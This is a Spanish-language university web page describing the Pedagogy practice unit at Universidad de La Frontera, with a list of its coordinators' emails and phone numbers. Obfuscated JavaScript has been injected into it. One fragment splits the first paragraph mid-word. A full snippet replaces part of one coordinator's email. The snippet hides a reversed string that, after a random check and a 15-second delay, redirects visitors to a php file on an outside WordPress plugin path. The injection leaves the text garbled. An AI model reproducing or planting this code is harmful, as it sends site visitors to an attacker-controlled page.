Unidad de prácticas

Esta unidad tiene como propósito gestionar los procesos de práctica de los estudiantes de las carreras de Pedagogía. Organizandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando tanto académica como administrativamente la vinculación con las instituciones que reciben a los estudiantes en práctica ya sea para vinculaciones tempranas o prácticas profesionales.

Además, se encarga de coordinar la red de profesores colaboradores de los distintos establecimientos que asisten la práctica de los estudiantes, contribuyendo a dilucidar los caminos que le permitirán al futuro profesor ir alcanzado el éxito en los procesos de enseñanza aprendizaje implementados en los liceos y escuelas de la región

Otra de las funciones del equipo de prácticas es el seguimiento y monitoreo del proceso de práctica profesional del estudiante, guiando la construcción de diseños de clases y artefactos pedagógicos, discutiendo las formas de tratamiento de los contenidos, supervisando clases y apoyando en la construcción de portafolios. Todo lo anterior en un marco de dialogo y reflexión constante que coadyuve a la formación de los futuros profesores.

Esta unidad presenta un Coordinador General, a cargo del profesor y magister Sr. Alvaro Villalba Migueles, y un coordinador por cada una de las ocho especialidades, así también, un coordinador para el área de Orientación.

Mari Carmen Villarroel

Pedagogía en Castellano y Comunicación

mari.villarroel@ufrontera.cl

45 2 734046

Luis Henriquez

Pedagogía en Educación Física, Deportes y Recreación

luis.henriquez.a@ufrontera.cl

45 2 596834

Fernando Herrera

Pedagogía en Historia, Geografía y Educación Cívica

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando.herrera@ufrontera.cl”>fernando.herrera@ufrontera.cl

445 2 734199

Elizabeth Henríquez

Pedagogía en Matemática

elizabeth.henriquez@ufrontera.cl

45 2 734199

Carlos Abarzua

Pedagogía en Ciencias m/Física

carlos.abarzua@ufrontera.cl

45 2 734199

Exequiel Rosales

Pedagogía en Ciencias m/Química

exequiel.rosales@ufrontera.cl

45 2 734199

Paola Bravo

Pedagogía en Ciencias m/Biología

paola.bravo@ufrontera.cl

45 2 734199

Carmen Ormazabal

carmen.ormazabal@ufrontera.cl

45 2 734199

Maritza Guzman

Orientación y Consejo de curso

maritza.guzman@ufrontera.cl

45 2 734199

Álvaro Villalba

Coordinación General Prácticas

alvaro.villalba@ufrontera.cl

45 2 734046

Valeria Soliz

Secretaria Coordinación

valeria.soliz@ufrontera.cl

45 2 734197

© 2016 Universidad de La Frontera